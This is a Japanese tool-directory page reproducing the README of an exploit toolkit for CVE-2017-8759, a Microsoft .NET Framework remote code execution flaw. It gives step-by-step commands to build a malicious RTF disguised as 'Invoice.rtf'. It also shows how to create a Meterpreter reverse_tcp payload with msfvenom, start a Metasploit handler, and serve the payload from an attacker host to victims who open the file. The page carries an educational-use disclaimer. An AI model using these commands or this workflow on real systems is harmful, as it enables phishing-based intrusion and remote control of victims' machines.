Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-8759 — エクスプロイトツールキット CVE-2017-8759 - v1.0 は、ペネトレーションテスターやセキュリティ研究者が Microsoft .NET Framework RCE を迅速かつ効果的にテストするための便利な Python スクリプトです。悪意のある RTF ファイルを生成し、複雑な設定なしで Metasploit / Meterpreter / その他のペイロードを被害者に配信できます。 | Kitploit
ツール/GitHubGitHub/bhdresh/cve-2017-8759
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubbhdresh/cve-2017-8759

CVE-2017-8759

エクスプロイトツールキット CVE-2017-8759 - v1.0 は、ペネトレーションテスターやセキュリティ研究者が Microsoft .NET Framework RCE を迅速かつ効果的にテストするための便利な Python スクリプトです。悪意のある RTF ファイルを生成し、複雑な設定なしで Metasploit / Meterpreter / その他のペイロードを被害者に配信できます。

リポジトリを見る
312109468年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

エクスプロイトツールキット CVE-2017-8759 - v1.0

エクスプロイトツールキット CVE-2017-8759 - v1.0 は、ペンテスターやセキュリティ研究者が Microsoft .NET Framework RCE を迅速かつ効果的にテストするための便利な Python スクリプトです。複雑な設定なしに、悪意のある RTF ファイルを生成し、Metasploit / Meterpreter / その他のペイロードを被害者に配信できます。

免責事項

このプログラムは教育目的のみに使用してください。許可なく使用しないでください。通常の免責事項が適用されます。特に、私 (bhdresh) は、これらのプログラムが提供する情報または機能の直接的または間接的な使用によって生じるいかなる損害についても責任を負いません。作成者またはインターネットプロバイダーは、これらのプログラムまたはその派生物のコンテンツや誤用について一切の責任を負いません。このプログラムを使用することにより、これらのプログラムの使用によって生じるデータ損失、システムクラッシュ、システム侵害などの損害は bhdresh の責任ではないことを承諾したものとします。

最後に、これは個人の開発です。その哲学を尊重し、悪用しないでください。

ライセンス

CC BY 4.0 ライセンス - https://creativecommons.org/licenses/by/4.0/

リリースノート

スクリプトに以下の機能を導入

root@kitploit:~
- 悪意のある RTF ファイルの生成
- 生成された RTF ファイルのエクスプロイトモード

バージョン: Python 2.7.13

シナリオ: ローカル Meterpreter ペイロードの配信

ビデオチュートリアル: https://www.youtube.com/watch?v=46jEa1bmORM
コマンド例
root@kitploit:~
1) 悪意のある RTF ファイルの生成
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (オプション、MSF ペイロードを使用する場合): Metasploit ペイロードを生成し、ハンドラを起動
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) ローカルペイロードを配信するためにツールキットをエクスプロイトモードで起動
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

コマンドライン引数

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

これは CVE-2017-8759 (Microsoft .NET Framework RCE) をエクスプロイトするための便利なツールキットです。

モード:

-M gen                                          悪意のあるファイルのみを生成

     悪意のある RTF ファイルの生成:

      -w <Filename.rtf>                   悪意のある RTF ファイルの名前 (このファイルを被害者と共有します)。

      -u <http://attacker.com/test.txt>   リモートテキストファイルのパス。通常、これはこのツールが実行されているドメインまたは IP である必要があります。
                                          例: http://attackerip.com/test.txt (この URL は悪意のある RTF ファイルに含まれ、被害者が悪意のある RTF ファイルを開くとリクエストされます)。

-M exp                                          エクスプロイトモードを開始

     エクスプロイト:
  
      -p <TCP port:Default 80>            ローカルポート番号。

      -e <http://attacker.com/shell.exe>  ターゲット上で実行する必要がある実行可能ファイル / Meterpreter シェル / ペイロードのパス。

      -l </tmp/shell.exe>                 実行可能ファイル / Meterpreter シェル / ペイロードのローカルパスを指定します。

作者

@bhdresh

クレジット

@Voulnet, @vysec, @bhdresh

バグ、問題、機能リクエスト

もちろん、私はフルタイムの開発者ではないので、多少の問題があるかもしれません。

バグや問題は https://github.com/bhdresh/CVE-2017-8759/issues/new から報告してください。

ツールをダウンロード